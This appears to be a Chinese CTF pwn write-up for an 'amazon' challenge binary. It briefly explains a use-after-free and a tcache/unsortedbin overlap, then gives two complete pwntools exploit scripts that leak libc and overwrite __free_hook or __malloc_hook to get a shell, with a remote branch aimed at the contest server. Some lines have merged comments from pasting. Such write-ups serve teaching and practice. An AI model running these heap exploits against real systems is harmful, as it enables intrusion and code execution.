数字安全 amazon

amazon

这道题 有个 uaf
但是 申请的 chunk 的前 0x20 用来放置规定的 内容,想要利用到tcache attack 就需要构造overlap

利用方法

  1. 利用tcache bin的知识,先将 unsortedbin 大小的chunk free掉,放置到tcachebin(填满后),放入 unsortedbin 利用到 unsortedbin 合并的特点 free 两个相邻chunk 从而构造合并。
  2. 因为可以规定 申请 chunk 的大小,所以我们 可以通过unsortedbin 申请一个很大的chunk 覆盖下一个chunk 的head 头从而实现tcachebin attack
  3. 如果劫持 __free_hook 我们需要把chunk 向上申请,让覆盖_IO_stdfile_lock 为0 (让锁为0从而能够进行 后面对程序的操作)再覆盖free_hook 为 system 。 或者覆盖 __malloc_hook 利用realloc_hook和malloc_hook 利用栈不平衡 从而用报错得到 shell

__free_hook

EXP

#!/usr/bin/python2.7  # -*- coding: utf-8 -*-from pwn import *
context.log_level = "debug"
context.arch = "amd64"

exe = './amazon'
elf = ELF(exe)

one = [0x4f2c5, 0x4f322, 0x10a38c]

#------------------------------------def d(s = ''):
        gdb.attach(p ,s)

def manu(idx):
        p.sendlineafter('choice: ', str(idx))

def add(num, size, note):
        manu(1)
        p.sendlineafter('buy: ', str(1))
        p.sendlineafter('many: ', str(num))
        p.sendlineafter('note: ', str(size))
        p.send(note)


def add1(num, size, note):
        manu(1)
        p.sendlineafter('buy: ', str(1))
        p.sendline(str(num))
        p.sendline(str(size))
        p.sendline(note)

def show():
        manu(2)

def checkout(idx):
        manu(3)
        p.sendlineafter('for: ', str(idx))

def pwn():
        add(2, 0x80, 'a')  #0
        add(2, 0xa0, 'A')  #1
        add(2, 0x90, 'A')  #2
        add(2, 0x10, 'A')  #4
        for i in range(8):
                checkout(0)

        for i in range(8):
                checkout(2)

        show()
        p.recvuntil('Name: ')
        libc.address = u64(p.recv(6).ljust(8, '\x00')) - 0x3ebca0
        success('libc.address--->'+hex(libc.address))
        for i in range(8):
                checkout(1)

        add(2, 0x100, '\xff'*0x80 +p64(3)+p64(0xa1) + p64(libc.sym['__free_hook']-0x40))
        checkout(0)
        add(2, 0xa0, 'a')
        add(2, 0x100, '\xff'*0x80 +p64(3)+p64(0xa1) + '/bin/sh\x00')
        add(2, 0xa0, '\x00'*0x20+p64(libc.sym['system']))
        d()
        checkout(5)
        
        p.interactive()
#-------------------------------------if __name__ == '__main__':
        l = 1
        if l:
                p = process(exe)
                libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
        else:
                p = remote('121.41.38.38', 9999)
                libc = ELF('libc-2.27.so')

        pwn()

__libc_realloc + __malloc_hook

#!/usr/bin/python2.7  # -*- coding: utf-8 -*-from pwn import *
context.log_level = "debug"
context.arch = "amd64"

exe = './amazon'
elf = ELF(exe)

one = [0x4f2c5, 0x4f322, 0x10a38c]

#------------------------------------def d(s = ''):
        gdb.attach(p ,s)

def manu(idx):
        p.sendlineafter('choice: ', str(idx))

def add(num, size, note):
        manu(1)
        p.sendlineafter('buy: ', str(1))
        p.sendlineafter('many: ', str(num))
        p.sendlineafter('note: ', str(size))
        p.send(note)


def show():
        manu(2)

def checkout(idx):
        manu(3)
        p.sendlineafter('for: ', str(idx))

def pwn():
        add(2, 0x80, 'a')  #0
        add(2, 0xa0, 'A')  #1
        add(2, 0x90, 'A')  #2
        add(2, 0x10, 'A')  #4
        for i in range(8):
                checkout(0)

        for i in range(8):
                checkout(2)

        show()
        p.recvuntil('Name: ')
        libc.address = u64(p.recv(6).ljust(8, '\x00')) - 0x3ebca0
        success('libc.address--->'+hex(libc.address))
        for i in range(8):
                checkout(1)

        add(2, 0x100, '\xff'*0x80 +p64(3)+p64(0xa1) + p64(libc.sym['__malloc_hook']-0x28))
        add(2, 0xa0, 'a')
        add(2, 0xa0, p64(libc.address+one[2])+p64(libc.sym["__libc_realloc"]+8))

        manu(1)
        p.sendlineafter('buy: ', str(1))
        p.sendlineafter('many: ', '1')
        p.sendlineafter('note: ', '0xa0')
    p.interactive()
#-------------------------------------if __name__ == '__main__':
        l = 1
        if l:
                p = process(exe)
                libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
        else:
                p = remote('121.41.38.38', 9999)
                libc = ELF('libc-2.27.so')

        pwn()
点赞

发表评论

电子邮件地址不会被公开。必填项已用 * 标注